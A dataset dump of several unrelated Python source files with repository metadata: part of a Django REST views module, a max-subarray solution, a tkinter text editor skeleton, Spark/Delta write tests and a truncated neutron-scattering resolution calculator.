TaskFollowups\n \"\"\"\n\n serializer_class = TaskFollowupSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n def get_queryset(self):\n project_id = int(self.kwargs[\"project_id\"])\n task_id = int(self.kwargs[\"task_id\"])\n\n user_projects = list(\n models.Project.on_site.for_user(self.request.user).values_list(flat=True)\n )\n\n if project_id not in user_projects:\n project = models.Project.objects.get(pk=project_id)\n if not (\n self.request.method == \"GET\"\n and self.request.user.has_perm(\"projects.use_tasks\", project)\n ):\n raise PermissionDenied()\n\n return models.TaskFollowup.objects.filter(task_id=task_id)\n\n def create(self, request, project_id, task_id):\n data = copy(request.data)\n data[\"task_id\"] = task_id\n data[\"who_id\"] = request.user.id\n\n serializer = self.get_serializer(data=data)\n serializer.is_valid(raise_exception=True)\n serializer.save()\n\n headers = self.get_success_headers(serializer.data)\n\n return Response(\n serializer.data, status=status.HTTP_201_CREATED, headers=headers\n )\n\n\nclass TaskViewSet(viewsets.ModelViewSet):\n \"\"\"\n API endpoint for project tasks\n \"\"\"\n\n def perform_update(self, serializer):\n original_object = self.get_object()\n updated_object = serializer.save()\n\n if original_object.public is False and updated_object.public is True:\n signals.action_created.send(\n sender=self,\n task=updated_object,\n project=updated_object.project,\n user=self.request.user,\n )\n\n @action(\n methods=[\"post\"],\n detail=True,\n )\n def move(self, request, project_id, pk):\n task = self.get_object()\n\n if not self.request.user.has_perm(\"projects.use_tasks\", task.project):\n # FIXME this line is not covered by a test\n raise PermissionDenied()\n\n above_id = request.POST.get(\"above\", None)\n below_id = request.POST.get(\"below\", None)\n\n if above_id:\n other_pk = above_id\n else:\n other_pk = below_id\n\n try:\n other_task = self.queryset.get(project_id=task.project_id, pk=other_pk)\n except models.Task.DoesNotExist:\n return Response(status=status.HTTP_404_NOT_FOUND)\n\n if above_id:\n task.above(other_task)\n return Response({\"status\": \"insert above done\"})\n\n if below_id:\n task.below(other_task)\n return Response({\"status\": \"insert below done\"})\n\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n def get_queryset(self):\n project_id = int(self.kwargs[\"project_id\"])\n\n project = models.Project.on_site.get(pk=project_id)\n\n if not (\n self.request.user.has_perm(\"projects.view_tasks\", project)\n or self.request.user.has_perm(\"sites.list_projects\", self.request.site)\n ):\n raise PermissionDenied()\n\n return self.queryset.filter(project_id=project_id).order_by(\n \"-created_on\", \"-updated_on\"\n )\n\n queryset = models.Task.on_site\n serializer_class = TaskSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n\nclass TaskNotificationViewSet(\n mixins.DestroyModelMixin,\n mixins.ListModelMixin,\n mixins.RetrieveModelMixin,\n viewsets.GenericViewSet,\n):\n \"\"\"\n API endpoint for Task\n \"\"\"\n\n def get_queryset(self):\n task_id = int(self.kwargs[\"task_id\"])\n task = models.Task.objects.get(pk=task_id)\n\n notifications = self.request.user.notifications.unread()\n\n task_ct = ContentType.objects.get_for_model(models.Task)\n followup_ct = ContentType.objects.get_for_model(models.TaskFollowup)\n\n task_actions = notifications.filter(\n action_object_content_type=task_ct.pk,\n action_object_object_id=task_id,\n )\n\n followup_ids = list(task.followups.all().values_list(\"id\", flat=True))\n\n # FIXME cannot find who create notifications on followups\n followup_actions = notifications.filter(\n action_object_content_type=followup_ct.pk,\n action_object_object_id__in=followup_ids,\n )\n\n return task_actions | followup_actions\n\n @action(\n methods=[\"post\"],\n detail=False,\n )\n def mark_all_as_read(self, request, project_id, task_id):\n self.get_queryset().mark_all_as_read(request.user)\n return Response({}, status=status.HTTP_200_OK)\n\n serializer_class = TaskNotificationSerializer\n permission_classes = [permissions.IsAuthenticated]\n\n\n########################################################################\n# user project statuses\n########################################################################\n\n\nclass UserProjectStatusDetail(APIView):\n \"\"\"Retrieve or update a user project status\"\"\"\n\n permission_classes = [permissions.IsAuthenticated]\n\n def get_object(self, pk):\n try:\n return models.UserProjectStatus.objects.get(pk=pk)\n except models.UserProjectStatus.DoesNotExist:\n raise Http404\n\n def get(self, request, pk, format=None):\n ups = self.get_object(pk)\n if ups.user != request.user:\n raise Http404\n context = {\"request\": request}\n serializer = UserProjectStatusSerializer(ups, context=context)\n return Response(serializer.data)\n\n def patch(self, request, pk, format=None):\n ups = self.get_object(pk)\n if ups.user != request.user:\n raise Http404\n context = {\"request\": request, \"view\": self, \"format\": format}\n serializer = UserProjectStatusSerializer(\n ups, context=context, data=request.data\n )\n if serializer.is_valid():\n old = copy(ups)\n new = serializer.save()\n if new:\n signals.project_userprojectstatus_updated.send(\n sender=self, old_one=old, new_one=new\n )\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserProjectStatusList(APIView):\n \"\"\"List all user project status\"\"\"\n\n permission_classes = [permissions.IsAuthenticated]\n\n def get(self, request, format=None):\n ups = fetch_the_site_project_statuses_for_user(request.site, request.user)\n context = {\"request\": request}\n\n serializer = UserProjectStatusForListSerializer(ups, context=context, many=True)\n return Response(serializer.data)\n\n\ndef fetch_the_site_project_statuses_for_user(site, user):\n \"\"\"Returns the complete user project status list for user on site\n\n Here we face a n+1 fetching problem that happens at multiple levels\n implying an explosition of requests (order of 400+ request for 30+ projects)\n The intent is to fetch each kind of objecst in on request and then to\n reattache the information to the appropriate object.\n \"\"\"\n project_statuses = models.UserProjectStatus.objects.filter(\n user=user, project__deleted=None\n )\n\n # create missing user project status\n create_missing_user_project_statuses(site, user, project_statuses)\n\n # fetch all projects statuses for user\n project_statuses = list(project_statuses.prefetch_related(\"user__profile\"))\n\n # associate related project information with each user project status\n update_user_project_status_with_their_project(site, user, project_statuses)\n\n # asscoiated related notification to their projects\n update_project_statuses_with_their_notifications(site, user, project_statuses)\n\n return project_statuses\n\n\ndef create_missing_user_project_statuses(site, user, project_statuses):\n \"\"\"Create user projects statuses for given projects\"\"\"\n\n # get projects with no user project status\n ids = list(project_statuses.values_list(\"project__id\", flat=True))\n projects = models.Project.on_site.for_user(user).exclude(id__in=ids)\n\n # create the missing ones\n new_statuses = [\n models.UserProjectStatus(user=user, site=site, project=p, status=\"NEW\")\n for p in projects\n ]\n models.UserProjectStatus.objects.bulk_create(new_statuses)\n\n\ndef update_user_project_status_with_their_project(site, user, project_statuses):\n \"\"\"Fetch all related projects and associate them with their project status\"\"\"\n\n # fetch all requested projects and their annotations in a single query\n ids = [ps.project_id for ps in project_statuses]\n projects = {p.id: p for p in fetch_site_projects_with_ids(site, ids)}\n\n # fetch all related site project switchtender to annotate furthemore the project\n switchtendering = {\n ps[\"project_id\"]: ps[\"is_observer\"]\n for ps in models.ProjectSwitchtender.objects.filter(\n site=site, switchtender=user, project_id__in=ids\n ).values(\"project_id\", \"is_observer\")\n }\n\n # update project statuses with the right project and switchtendering statuses\n for ps in project_statuses:\n ps.project = projects[ps.project_id]\n ps.is_switchtender = ps.project_id in switchtendering\n ps.is_observer = switchtendering.get(ps.project_id, False)\n\n\ndef update_project_statuses_with_their_notifications(site, user, project_statuses):\n \"\"\"Fetch all the related notifications and associate them w/ their projects\"\"\"\n\n # projects of interest\n project_ids = [s.project_id for s in project_statuses]\n\n notifications = notifications_models.Notification.on_site.filter(recipient=user)\n\n project_ct = ContentType.objects.get_for_model(models.Project)\n\n advisor_group = get_group_for_site(\"advisor\", site)\n advisors = [\n int(advisor) for advisor in advisor_group.user_set.values_list(\"id\", flat=True)\n ]\n\n unread_notifications = (\n notifications.filter(\n target_content_type=project_ct.pk, target_object_id__in=project_ids\n )\n .unread()\n .order_by(\"target_object_id\")\n )\n\n # fetch the related notifications\n all_unread_notifications = (\n unread_notifications.values(project_id=F(\"target_object_id\"))\n .annotate(count=Count(\"id\", distinct=True))\n .annotate(\n unread_public_messages=Count(\n \"id\", filter=Q(verb=verbs.Conversation.PUBLIC_MESSAGE)\n )\n )\n .annotate(\n unread_private_messages=Count(\n \"id\", filter=Q(verb=verbs.Conversation.PRIVATE_MESSAGE)\n )\n )\n .annotate(\n new_recommendations=Count(\"id\", filter=Q(verb=verbs.Recommendation.CREATED))\n )\n )\n notifications = {n[\"project_id\"]: n for n in all_unread_notifications}\n\n # Specific request for collaborator activity as it relies on exclusion\n collaborator_activity = (\n unread_notifications.exclude(actor_object_id__in=advisors)\n .values(project_id=F(\"target_object_id\"))\n .annotate(activity=Count(\"id\"))\n )\n collaborators = {n[\"project_id\"]: n[\"activity\"] for n in collaborator_activity}\n\n # the empty dict is going to be used read only, so sharing same object\n empty = {\n \"count\": 0,\n \"has_collaborator_activity\": False,\n \"unread_public_messages\": 0,\n \"unread_private_messages\": 0,\n \"new_recommendations\": 0,\n }\n\n # for each project associate the corresponding notifications\n for ps in project_statuses:\n ps.project.notifications = notifications.get(str(ps.project_id), empty)\n active = bool(collaborators.get(str(ps.project_id)))\n ps.project.notifications[\"has_collaborator_activity\"] = active\n\n\ndef fetch_site_projects_with_ids(site, ids):\n \"\"\"Return site projects with given ids including annotations.\"\"\"\n return (\n models.Project.objects.filter(id__in=ids)\n .prefetch_related(\"commune__department\")\n .prefetch_related(\"switchtenders__profile\")\n .prefetch_related(\"switchtenders__profile__organization\")\n .annotate(\n recommendation_count=Count(\n \"tasks\",\n filter=Q(tasks__public=True, tasks__site=site),\n distinct=True,\n )\n )\n .annotate(\n public_message_count=Count(\n \"notes\",\n filter=Q(notes__public=True, notes__site=site),\n distinct=True,\n )\n )\n .annotate(\n private_message_count=Count(\n \"notes\",\n filter=Q(notes__public=False, notes__site=site),\n distinct=True,\n )\n )\n )\n\n\n# eof\n","repo_name":"Mozzaco/urbanvitaliz-django","sub_path":"urbanvitaliz/apps/projects/views/rest.py","file_name":"rest.py","file_ext":"py","file_size_in_byte":19064,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"52"} +{"seq_id":"74508977763","text":"import sys\ninput = sys.stdin.readline\nn = int(input())\narr = list(map(int,input().split()))\ndp = [0]*n #dp배열의 값��� 해당위치에 있을때의 최댓값이다.\ndp[0] = arr[0] #초기값설정\nfor i in range(1,n):\n dp[i]=max(dp[i-1]+arr[i],arr[i])\nprint(dp)\nprint(max(dp))\n\n#arr = [2, 1, -4, 3, 4,-4, 6, 5, -5, 1]\n#dp = [2, 3, -1, 3, 7, 3, 9, 14, 9, 10]\n\n#[-2,-1,3,-3,4]\n#[-2,-1,3,-3,4]\n#","repo_name":"young0264/hellopycharm","sub_path":"백준/1912_연속합.py","file_name":"1912_연속합.py","file_ext":"py","file_size_in_byte":406,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"16395177295","text":"import tkinter as tk\nfrom tkinter import ttk\nfrom tkinter import font, filedialog, messagebox\nimport os\n\nmain_application = tk.Tk()\nmain_application.geometry(\"1200x800\")\nmain_application.title(\"Text Editor\")\n\n########################## main menu ##########################\nmain_menu = tk.Menu()\n\n### File ###\n# file icons\nnew_icon = tk.PhotoImage(file='icons2/new.png')\nopen_icon = tk.PhotoImage(file='icons2/open.png')\nsave_icon = tk.PhotoImage(file='icons2/save.png')\nsave_as_icon = tk.PhotoImage(file='icons2/save_as.png')\nexit_icon = tk.PhotoImage(file='icons2/exit.png')\n\nfile = tk.Menu(main_menu, tearoff=False)\n\n### Edit ###\n# Edit icon #\ncopy_icon = tk.PhotoImage(file='icons2/copy.png')\npaste_icon = tk.PhotoImage(file='icons2/paste.png')\ncut_icon = tk.PhotoImage(file='icons2/cut.png')\nclear_all_icon = tk.PhotoImage(file='icons2/clear_all.png')\nfind_icon = tk.PhotoImage(file='icons2/find.png')\n\nedit = tk.Menu(main_menu, tearoff=False)\n\n### View ###\n# View icons #\ntool_bar_icon = tk.PhotoImage(file='icons2/tool_bar.png')\nstatus_bar_icon = tk.PhotoImage(file='icons2/status_bar.png')\n\nview = tk.Menu(main_menu, tearoff=False)\n\n### Color Theme ###\n# Color icons #\nlight_default_icon = tk.PhotoImage(file='icons2/light_default.png')\nlight_plus_icon = tk.PhotoImage(file='icons2/light_plus.png')\ndark_icon = tk.PhotoImage(file='icons2/dark.png')\nred_icon = tk.PhotoImage(file='icons2/red.png')\nmonokai_icon = tk.PhotoImage(file='icons2/monokai.png')\nnight_blue_icon = tk.PhotoImage(file='icons2/night_blue.png')\n\ncolor_theme = tk.Menu(main_menu, tearoff=False)\n\ntheme_choice = tk.StringVar()\ncolor_icons = (light_default_icon, light_plus_icon, dark_icon, red_icon, monokai_icon, night_blue_icon)\n\ncolor_dict = {\n 'Light Default': ('#000000', '#ffffff'),\n 'Light Plus': ('#474747', '#e0e0e0e'),\n 'Dark': ('#c4c4c4', '#2d2d2d'),\n 'Red': ('#2d2d2d', '#ffe8e8'),\n 'Monokai': ('#d3b774', '#474747'),\n 'Night Blue': ('#ededed', '#6b9dc2')\n}\n\n# cascade\nmain_menu.add_cascade(label='file', menu=file)\nmain_menu.add_cascade(label='edit', menu=edit)\nmain_menu.add_cascade(label='view', menu=view)\nmain_menu.add_cascade(label='color theme', menu=color_theme)\n# -----------------&&&&&&& end main menu &&&&&------------------\n\n\n########################## toolbar ##########################\n\n# Label #\ntool_bar = ttk.Label(main_application)\ntool_bar.pack(side=tk.TOP, fill=tk.X)\n\n## Font Box ##\nfont_tuple = tk.font.families()\n#print(font_tuple)\nfont_family = tk.StringVar()\nfont_box = ttk.Combobox(tool_bar, width=30, state='readonly', textvariable=font_family)\nfont_box['values'] = font_tuple\nfont_box.current(font_tuple.index('FontAwesome'))\nfont_box.grid(row=0, column=0, padx=5)\n\n## Font Sixe Box ##\nfont_size_tuple = tuple(range(10, 80, 2))\nfont_size_var = tk.StringVar()\nfont_size_box = ttk.Combobox(tool_bar, width=15, state='readonly', textvariable=font_size_var)\nfont_size_box['values'] = font_size_tuple\nfont_size_box.current(3)\nfont_size_box.grid(row=0, column=1, padx=5)\n\n## Bold Button ##\nbold_icon = tk.PhotoImage(file='icons2/bold.png')\nbold_btn = ttk.Button(tool_bar, image=bold_icon)\nbold_btn.grid(row=0, column=2, padx=5)\n\n## Italic Button ##\nitalic_icon = tk.PhotoImage(file='icons2/italic.png')\nitalic_btn = ttk.Button(tool_bar, image=italic_icon)\nitalic_btn.grid(row=0, column=3, padx=5)\n\n## Underline Button ##\nunderline_icon = tk.PhotoImage(file='icons2/underline.png')\nunderline_btn = ttk.Button(tool_bar, image=underline_icon)\nunderline_btn.grid(row=0, column=4, padx=5)\n\n## Font Button ##\nfont_color_icon = tk.PhotoImage(file='icons2/font_color.png')\nfont_btn = ttk.Button(tool_bar, image=font_color_icon)\nfont_btn.grid(row=0, column=5, padx=5)\n\n## Align Left ##\nalign_left_icon = tk.PhotoImage(file='icons2/align_left.png')\nalign_left_btn = ttk.Button(tool_bar, image=align_left_icon)\nalign_left_btn.grid(row=0, column=6, padx=5)\n\n## Align Center ##\nalign_center_icon = tk.PhotoImage(file='icons2/align_center.png')\nalign_center_btn = ttk.Button(tool_bar, image=align_center_icon)\nalign_center_btn.grid(row=0, column=7, padx=5)\n\n## Align Right ##\nalign_right_icon = tk.PhotoImage(file='icons2/align_right.png')\nalign_center_btn = ttk.Button(tool_bar, image=align_center_icon)\nalign_center_btn.grid(row=0, column=8, padx=5)\n\n# -----------------&&&&&&& end toolbar &&&&&------------------\n\n\n########################## text editor ##########################\n\ntext_editor = tk.Text(main_application)\ntext_editor.config(wrap='word', relief=tk.FLAT)\nscroll_bar = tk.Scrollbar(main_application)\ntext_editor.focus_set()\nscroll_bar.pack(side=tk.RIGHT, fill=tk.Y)\ntext_editor.pack(fill=tk.BOTH, expand=True)\nscroll_bar.config(command=text_editor.yview)\ntext_editor.config(yscrollcommand=scroll_bar.set)\n\n\n# -----------------&&&&&&& end text editor &&&&&------------------\n\n\n########################## status bar ##########################\n# -----------------&&&&&&& end status bar &&&&&------------------\n\n\n########################## main menu functionality ##########################\n\n# File #\nfile.add_command(label='New', image=new_icon, compound=tk.LEFT, accelerator='Ctrl+N')\nfile.add_command(label='Open', image=open_icon, compound=tk.LEFT, accelerator='CTRL+O')\nfile.add_command(label='Save', image=save_icon, compound=tk.LEFT, accelerator='Ctrl+S')\nfile.add_command(label='Save As', image=save_as_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+S')\nfile.add_command(label='Exit', image=exit_icon, compound=tk.LEFT, accelerator='Ctrl+Q')\n\n# Edit #\nedit.add_command(label='Copy', image=copy_icon, compound=tk.LEFT, accelerator='Ctrl+C')\nedit.add_command(label='Paste', image=paste_icon, compound=tk.LEFT, accelerator='Ctrl+P')\nedit.add_command(label='Cut', image=cut_icon, compound=tk.LEFT, accelerator='Ctrl+X')\nedit.add_command(label='Clear All', image=clear_all_icon, compound=tk.LEFT, accelerator='Ctrl+Alt+X')\nedit.add_command(label='Find', image=find_icon, compound=tk.LEFT, accelerator='Ctrl+F')\n\n# View #\nview.add_checkbutton(label='Tool Bar', image=tool_bar_icon, compound=tk.LEFT)\nview.add_checkbutton(label='Status Bar', image=status_bar_icon, compound=tk.LEFT)\n\n# Color Theme #\ncount = 0\nfor color in color_dict:\n color_theme.add_radiobutton(label=color, image=color_icons[count], compound=tk.LEFT,\n variable=theme_choice)\n count += 1\n\n# -----------------&&&&&&& end main menu functionality &&&&&------------------\n\nmain_application.config(menu=main_menu)\nmain_application.mainloop()\n","repo_name":"mrugankray/texty","sub_path":"pad.py","file_name":"pad.py","file_ext":"py","file_size_in_byte":6469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"26604278743","text":"\"\"\"Unit tests for the write entrypoint.\"\"\"\n\nfrom unittest.mock import patch\n\nimport pytest\nfrom pyspark.sql import types as T\n\nfrom getl.blocks.write.batch_delta import BatchDelta\nfrom getl.blocks.write.entrypoint import batch_delta, batch_json\n\nschema = T.StructType(\n [\n T.StructField(\"file_path\", T.StringType(), True),\n T.StructField(\"count\", T.IntegerType(), True),\n T.StructField(\"year\", T.IntegerType(), True),\n T.StructField(\"month\", T.IntegerType(), True),\n ]\n)\n\n\ndef create_dataframe(spark_session, data):\n return spark_session.createDataFrame(data, schema)\n\n\n# TESTS\n@patch(\"getl.blocks.write.entrypoint.HiveTable\")\ndef test_batch_delta_overwrite(m_hive_table, helpers, spark_session, tmp_dir):\n \"\"\"Batch write delta files.\"\"\"\n # Arrange\n props = {\n \"Path\": tmp_dir,\n \"Mode\": \"overwrite\",\n \"HiveTable\": {\"DatabaseName\": \"default\", \"TableName\": \"table\"},\n }\n bconf = helpers.create_block_conf(\n create_dataframe(spark_session, [(\"abc\", 1, 2020, 10), (\"qwe\", 2, 2020, 10)]),\n props,\n )\n\n # Act\n batch_delta(bconf)\n\n # Assert\n assert spark_session.read.load(tmp_dir, format=\"delta\").count() == 2\n assert m_hive_table.called\n\n\n@patch(\"getl.blocks.write.entrypoint.HiveTable\")\n@patch.object(BatchDelta, \"write\")\ndef test_batch_delta_partitionby(\n m_write, m_hive_table, helpers, spark_session, tmp_dir\n):\n \"\"\"Batch write delta files with partitionBy.\"\"\"\n # Arrange\n props = {\n \"Path\": tmp_dir,\n \"Mode\": \"overwrite\",\n \"PartitionBy\": {\"Columns\": [\"year\", \"month\"]},\n \"MergeSchema\": True,\n \"HiveTable\": {\"DatabaseName\": \"default\", \"TableName\": \"table\"},\n }\n bconf = helpers.create_block_conf(\n create_dataframe(\n spark_session,\n [(\"abc\", 1, 2020, 10), (\"qwe\", 2, 2021, 11), (\"asd\", 3, 2021, 12)],\n ),\n props,\n )\n\n # Act\n batch_delta(bconf)\n\n # Assert\n m_write.assert_called_once_with(\n tmp_dir,\n \"overwrite\",\n [\"year\", \"month\"],\n True,\n database_name=\"default\",\n table_name=\"table\",\n )\n assert m_hive_table.called\n\n\n@pytest.mark.parametrize(\n \"params, calls\",\n [\n ({}, []),\n ({\"Optimize\": {\"Enabled\": False}}, []),\n ({\"Optimize\": {\"Enabled\": True}}, [None]),\n ({\"Optimize\": {\"Enabled\": True, \"ZorderBy\": \"columnking\"}}, [\"columnking\"]),\n ],\n)\n@patch(\"getl.blocks.write.entrypoint.HiveTable\")\n@patch.object(BatchDelta, \"optimize\")\ndef test_batch_delta_optimize(\n m_optimize, m_hive_table, params, calls, helpers, spark_session, tmp_dir\n):\n \"\"\"While writing create a hive table with and without ZOPTIMIZE.\"\"\"\n # Arrange\n props = {\n \"Path\": tmp_dir,\n \"Mode\": \"overwrite\",\n \"HiveTable\": {\"DatabaseName\": \"default\", \"TableName\": \"table\"},\n **params,\n }\n bconf = helpers.create_block_conf(\n create_dataframe(spark_session, [(\"abc\", 1, 2020, 10)]), props\n )\n\n # Act\n batch_delta(bconf)\n\n # Assert\n if calls:\n m_optimize.assert_called_once_with(bconf.spark, \"default\", \"table\", *calls)\n else:\n assert not m_optimize.called\n\n\n@pytest.mark.parametrize(\n \"params, calls\",\n [\n ({}, []),\n ({\"Vacuum\": {\"Enabled\": False}}, []),\n ({\"Vacuum\": {\"Enabled\": True}}, [168]),\n ({\"Vacuum\": {\"Enabled\": True, \"RetainHours\": 1000}}, [1000]),\n ],\n)\n@patch(\"getl.blocks.write.entrypoint.HiveTable\")\n@patch.object(BatchDelta, \"vacuum\")\ndef test_batch_delta_vacuum(\n m_vacuum, m_hive_table, params, calls, helpers, spark_session, tmp_dir\n):\n \"\"\"Test the batch delta vacuum proprety.\"\"\"\n # Arrange\n props = {\n \"Path\": tmp_dir,\n \"Mode\": \"overwrite\",\n \"HiveTable\": {\"DatabaseName\": \"default\", \"TableName\": \"table\"},\n **params,\n }\n bconf = helpers.create_block_conf(\n create_dataframe(spark_session, [(\"abc\", 1, 2020, 10)]), props\n )\n\n # Act\n batch_delta(bconf)\n\n # Assert\n if calls:\n m_vacuum.assert_called_once_with(bconf.spark, \"default\", \"table\", *calls)\n else:\n assert not m_vacuum.called\n\n\n@patch(\"getl.blocks.write.entrypoint.HiveTable\")\ndef test_batch_delta_upsert(m_hive_table, tmp_dir, helpers, spark_session):\n \"\"\"Insert of update delta files when keys match.\"\"\"\n # Arrange\n props = {\n \"Path\": tmp_dir,\n \"Mode\": \"upsert\",\n \"Upsert\": {\"MergeStatement\": \"source.file_path = updates.file_path\"},\n \"HiveTable\": {\"DatabaseName\": \"default\", \"TableName\": \"table\"},\n }\n first_df = create_dataframe(\n spark_session, [(\"path/to/file1\", 1, 2020, 10), (\"path/to/file2\", 4, 2020, 10)]\n )\n second_df = create_dataframe(\n spark_session, [(\"path/to/file1\", 5, 2020, 10), (\"path/to/file6\", 6, 2020, 10)]\n )\n\n # Act & Assert: First time we need to create a delta table\n bconf = helpers.create_block_conf(first_df, props)\n batch_delta(bconf)\n assert spark_session.read.load(tmp_dir, format=\"delta\").count() == 2\n\n # Act & Assert: Second time we do an upsert when files exist\n bconf = helpers.create_block_conf(second_df, props)\n batch_delta(bconf)\n assert spark_session.read.load(tmp_dir, format=\"delta\").count() == 3\n\n\n@patch.object(BatchDelta, \"write\")\n@patch(\"getl.blocks.write.entrypoint.HiveTable\")\ndef test_batch_clean_write(m_hive_table, m_write, s3_mock, helpers):\n \"\"\"Insert of update delta files when keys match.\"\"\"\n # Arrange\n props = {\n \"Path\": \"s3://tmp-bucket/\",\n \"Mode\": \"clean_write\",\n \"HiveTable\": {\"DatabaseName\": \"default\", \"TableName\": \"table\"},\n }\n # Act & Assert:\n bconf = helpers.create_block_conf(None, props)\n batch_delta(bconf)\n m_write.assert_called_once_with(\n \"s3://tmp-bucket/\",\n \"overwrite\",\n None,\n False,\n database_name=\"default\",\n table_name=\"table\",\n )\n\n\ndef test_write_batch_json(helpers, spark_session, tmp_path):\n \"\"\"Batch write json files with partitionBy.\"\"\"\n # Arrange\n props = {\n \"Path\": str(tmp_path),\n \"Mode\": \"overwrite\",\n # \"PartitionBy\": {\"Columns\": [\"year\", \"month\"]},\n \"HiveTable\": {\"DatabaseName\": \"default\", \"TableName\": \"table\"},\n }\n df = create_dataframe(\n spark_session,\n [(\"abc\", 1, 2020, 10), (\"qwe\", 2, 2021, 11), (\"asd\", 3, 2021, 12)],\n )\n\n bconf = helpers.create_block_conf(df, props)\n\n # Act\n batch_json(bconf)\n\n df_read = spark_session.read.load(str(tmp_path), format=\"json\", schema=schema)\n\n assert df.orderBy(\"file_path\").collect() == df_read.orderBy(\"file_path\").collect()\n\n\ndef test_write_batch_json_partitionBy(helpers, spark_session, tmp_path):\n \"\"\"Batch write json files with partitionBy.\"\"\"\n # Arrange\n props = {\n \"Path\": str(tmp_path),\n \"Mode\": \"overwrite\",\n \"PartitionBy\": {\"Columns\": [\"year\", \"month\"]},\n \"HiveTable\": {\"DatabaseName\": \"default\", \"TableName\": \"table\"},\n }\n df = create_dataframe(\n spark_session,\n [(\"abc\", 1, 2020, 10), (\"qwe\", 2, 2021, 11), (\"asd\", 3, 2021, 12)],\n )\n\n bconf = helpers.create_block_conf(df, props)\n\n # Act\n batch_json(bconf)\n\n assert (tmp_path / \"year=2021\").exists()\n\n df_read = spark_session.read.load(\n str(tmp_path), format=\"json\", recursivePath=True, schema=schema\n )\n\n assert df.orderBy(\"file_path\").collect() == df_read.orderBy(\"file_path\").collect()\n","repo_name":"husqvarnagroup/GETL","sub_path":"tests/getl/blocks/write/test_write_entrypoint.py","file_name":"test_write_entrypoint.py","file_ext":"py","file_size_in_byte":7478,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"52"} +{"seq_id":"41468731848","text":"\"\"\"\nThis object is a small tool to allow user to quickly\ndetermine the variance in q from the\ninstrumental parameters.\n\"\"\"\nimport sys\nfrom math import pi, sqrt\nimport math\nimport logging\n\nimport numpy as np\n\nfrom .instrument import Sample\nfrom .instrument import Detector\nfrom .instrument import TOF as Neutron\nfrom .instrument import Aperture\n\nlogger = logging.getLogger(__name__)\n\n#Plank's constant in cgs unit\n_PLANK_H = 6.62606896E-27\n#Gravitational acc. in cgs unit\n_GRAVITY = 981.0\n\n\nclass ResolutionCalculator(object):\n \"\"\"\n compute resolution in 2D\n \"\"\"\n def __init__(self):\n\n # wavelength\n self.wave = Neutron()\n # sample\n self.sample = Sample()\n # aperture\n self.aperture = Aperture()\n # detector\n self.detector = Detector()\n # 2d image of the resolution\n self.image = []\n self.image_lam = []\n # resolutions\n # lamda in r-direction\n self.sigma_lamd = 0\n # x-dir (no lamda)\n self.sigma_1 = 0\n #y-dir (no lamda)\n self.sigma_2 = 0\n # 1D total\n self.sigma_1d = 0\n self.gravity_phi = None\n # q min and max\n self.qx_min = -0.3\n self.qx_max = 0.3\n self.qy_min = -0.3\n self.qy_max = 0.3\n # q min and max of the detector\n self.detector_qx_min = -0.3\n self.detector_qx_max = 0.3\n self.detector_qy_min = -0.3\n self.detector_qy_max = 0.3\n # possible max qrange\n self.qxmin_limit = 0\n self.qxmax_limit = 0\n self.qymin_limit = 0\n self.qymax_limit = 0\n\n # plots\n self.plot = None\n # instrumental params defaults\n self.mass = 0\n self.intensity = 0\n self.wavelength = 0\n self.wavelength_spread = 0\n self.source_aperture_size = []\n self.source2sample_distance = []\n self.sample2sample_distance = []\n self.sample_aperture_size = []\n self.sample2detector_distance = []\n self.detector_pix_size = []\n self.detector_size = []\n self.get_all_instrument_params()\n # max q range for all lambdas\n self.qxrange = []\n self.qyrange = []\n\n def compute_and_plot(self, qx_value, qy_value, qx_min, qx_max,\n qy_min, qy_max, coord='cartesian'):\n \"\"\"\n Compute the resolution\n : qx_value: x component of q\n : qy_value: y component of q\n \"\"\"\n # make sure to update all the variables need.\n # except lambda, dlambda, and intensity\n self.get_all_instrument_params()\n # wavelength etc.\n lamda_list, dlamb_list = self.get_wave_list()\n intens_list = []\n sig1_list = []\n sig2_list = []\n sigr_list = []\n sigma1d_list = []\n num_lamda = len(lamda_list)\n for num in range(num_lamda):\n lam = lamda_list[num]\n # wavelength spread\n dlam = dlamb_list[num]\n intens = self.setup_tof(lam, dlam)\n intens_list.append(intens)\n # cehck if tof\n if num_lamda > 1:\n tof = True\n else:\n tof = False\n # compute 2d resolution\n _, _, sigma_1, sigma_2, sigma_r, sigma1d = \\\n self.compute(lam, dlam, qx_value, qy_value, coord, tof)\n # make image\n image = self.get_image(qx_value, qy_value, sigma_1, sigma_2,\n sigma_r, qx_min, qx_max, qy_min, qy_max,\n coord, False)\n if qx_min > self.qx_min:\n qx_min = self.qx_min\n if qx_max < self.qx_max:\n qx_max = self.qx_max\n if qy_min > self.qy_min:\n qy_min = self.qy_min\n if qy_max < self.qy_max:\n qy_max = self.qy_max\n\n # set max qranges\n self.qxrange = [qx_min, qx_max]\n self.qyrange = [qy_min, qy_max]\n sig1_list.append(sigma_1)\n sig2_list.append(sigma_2)\n sigr_list.append(sigma_r)\n sigma1d_list.append(sigma1d)\n # redraw image in global 2d q-space.\n self.image_lam = []\n total_intensity = 0\n sigma_1 = 0\n sigma_r = 0\n sigma_2 = 0\n sigma1d = 0\n for ind in range(num_lamda):\n lam = lamda_list[ind]\n dlam = dlamb_list[ind]\n intens = self.setup_tof(lam, dlam)\n out = self.get_image(qx_value, qy_value, sig1_list[ind],\n sig2_list[ind], sigr_list[ind],\n qx_min, qx_max, qy_min, qy_max, coord)\n # this is the case of q being outside the detector\n #if numpy.all(out==0.0):\n # continue\n image = out\n # set variance as sigmas\n sigma_1 += sig1_list[ind] * sig1_list[ind] * self.intensity\n sigma_r += sigr_list[ind] * sigr_list[ind] * self.intensity\n sigma_2 += sig2_list[ind] * sig2_list[ind] * self.intensity\n sigma1d += sigma1d_list[ind] * sigma1d_list[ind] * self.intensity\n total_intensity += self.intensity\n\n if total_intensity != 0:\n # average variance\n image_out = image / total_intensity\n sigma_1 = sigma_1 / total_intensity\n sigma_r = sigma_r / total_intensity\n sigma_2 = sigma_2 / total_intensity\n sigma1d = sigma1d / total_intensity\n # set sigmas\n self.sigma_1 = 